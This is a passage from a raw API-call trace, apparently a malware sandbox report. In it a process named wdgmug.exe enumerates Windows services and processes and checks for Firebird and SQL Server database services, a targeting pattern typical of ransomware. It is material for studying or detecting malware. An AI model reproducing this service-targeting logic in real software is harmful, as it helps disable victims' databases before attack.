(lpString="RpcSs") returned 5 [0309.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0309.130] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0309.130] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0309.130] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0309.130] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0309.130] lstrlenW (lpString="SamSs") returned 5 [0309.130] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0309.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0309.131] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0309.131] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0309.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0309.131] lstrlenW (lpString="Schedule") returned 8 [0309.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0309.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0309.131] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0309.131] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0309.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0309.131] lstrlenW (lpString="SecurityHealthService") returned 21 [0309.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0309.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0309.131] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0309.131] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0309.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0309.131] lstrlenW (lpString="SENS") returned 4 [0309.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0309.131] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0309.131] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0309.131] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0309.131] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0309.131] lstrlenW (lpString="ShellHWDetection") returned 16 [0309.131] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0309.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0309.132] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0309.132] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0309.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0309.132] lstrlenW (lpString="Spooler") returned 7 [0309.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0309.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0309.132] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0309.132] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0309.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0309.132] lstrlenW (lpString="StateRepository") returned 15 [0309.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0309.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0309.132] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0309.132] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0309.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0309.132] lstrlenW (lpString="SysMain") returned 7 [0309.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0309.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0309.132] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0309.132] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0309.132] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0309.132] lstrlenW (lpString="SystemEventsBroker") returned 18 [0309.132] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0309.132] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0309.132] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0309.133] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0309.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0309.133] lstrlenW (lpString="Themes") returned 6 [0309.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0309.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0309.133] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0309.133] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0309.133] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0309.133] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0309.133] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0309.133] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0309.133] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0309.133] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0309.133] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4150d60 | out: hHeap=0x470000) returned 1 [0309.133] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x520 [0309.354] Process32FirstW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0309.354] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0309.355] lstrlenW (lpString="System") returned 6 [0309.355] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0309.356] lstrlenW (lpString="smss.exe") returned 8 [0309.356] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0309.357] lstrlenW (lpString="csrss.exe") returned 9 [0309.357] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x19c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0309.357] lstrlenW (lpString="wininit.exe") returned 11 [0309.358] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0309.358] lstrlenW (lpString="csrss.exe") returned 9 [0309.358] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0309.359] lstrlenW (lpString="winlogon.exe") returned 12 [0309.359] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0309.359] lstrlenW (lpString="services.exe") returned 12 [0309.359] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0309.360] lstrlenW (lpString="lsass.exe") returned 9 [0309.360] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0309.361] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0309.361] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0309.361] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0309.361] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.362] lstrlenW (lpString="svchost.exe") returned 11 [0309.362] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.363] lstrlenW (lpString="svchost.exe") returned 11 [0309.363] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0309.363] lstrlenW (lpString="dwm.exe") returned 7 [0309.363] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.364] lstrlenW (lpString="svchost.exe") returned 11 [0309.364] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.364] lstrlenW (lpString="svchost.exe") returned 11 [0309.364] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.365] lstrlenW (lpString="svchost.exe") returned 11 [0309.365] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.366] lstrlenW (lpString="svchost.exe") returned 11 [0309.366] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.366] lstrlenW (lpString="svchost.exe") returned 11 [0309.366] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.367] lstrlenW (lpString="svchost.exe") returned 11 [0309.367] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.368] lstrlenW (lpString="svchost.exe") returned 11 [0309.368] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.368] lstrlenW (lpString="svchost.exe") returned 11 [0309.368] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.369] lstrlenW (lpString="svchost.exe") returned 11 [0309.369] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.369] lstrlenW (lpString="svchost.exe") returned 11 [0309.370] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0309.370] lstrlenW (lpString="spoolsv.exe") returned 11 [0309.370] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.371] lstrlenW (lpString="svchost.exe") returned 11 [0309.371] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0309.371] lstrlenW (lpString="audiodg.exe") returned 11 [0309.372] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0309.372] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0309.372] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0309.373] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0309.373] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0309.373] lstrlenW (lpString="Memory Compression") returned 18 [0309.373] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0309.374] lstrlenW (lpString="sihost.exe") returned 10 [0309.374] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0309.375] lstrlenW (lpString="svchost.exe") returned 11 [0309.375] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0309.375] lstrlenW (lpString="taskhostw.exe") returned 13 [0309.375] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0309.376] lstrlenW (lpString="explorer.exe") returned 12 [0309.376] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0309.377] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0309.377] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0309.377] lstrlenW (lpString="SearchUI.exe") returned 12 [0309.377] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0309.378] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0309.378] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0309.378] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0309.378] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0309.379] lstrlenW (lpString="wdgmug.exe") returned 10 [0309.379] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0309.380] lstrlenW (lpString="cmd.exe") returned 7 [0309.380] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0309.380] lstrlenW (lpString="conhost.exe") returned 11 [0309.380] Process32NextW (in: hSnapshot=0x520, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0309.381] CloseHandle (hObject=0x520) returned 1 [0309.381] Sleep (dwMilliseconds=0x1f4) [0310.389] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a300 [0310.390] EnumServicesStatusExW (in: hSCManager=0x401a300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0310.391] GetLastError () returned 0xea [0310.391] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1c30) returned 0x4150d60 [0310.391] EnumServicesStatusExW (in: hSCManager=0x401a300, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4150d60, cbBufSize=0x1c30, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4150d60, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0310.392] CloseServiceHandle (hSCObject=0x401a300) returned 1 [0310.392] lstrlenW (lpString="Appinfo") returned 7 [0310.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0310.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0310.392] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0310.392] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0310.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0310.392] lstrlenW (lpString="AppXSvc") returned 7 [0310.392] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0310.392] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0310.392] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0310.392] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0310.392] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0310.393] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0310.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0310.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0310.393] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0310.393] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0310.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0310.393] lstrlenW (lpString="Audiosrv") returned 8 [0310.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0310.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0310.393] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0310.393] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0310.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0310.393] lstrlenW (lpString="BFE") returned 3 [0310.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0310.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0310.393] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0310.393] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0310.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0310.393] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0310.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0310.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0310.393] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0310.393] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0310.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0310.393] lstrlenW (lpString="CDPSvc") returned 6 [0310.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0310.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0310.394] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0310.394] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0310.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0310.394] lstrlenW (lpString="ClickToRunSvc") returned 13 [0310.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0310.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0310.394] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0310.394] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0310.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0310.394] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0310.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0310.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0310.394] 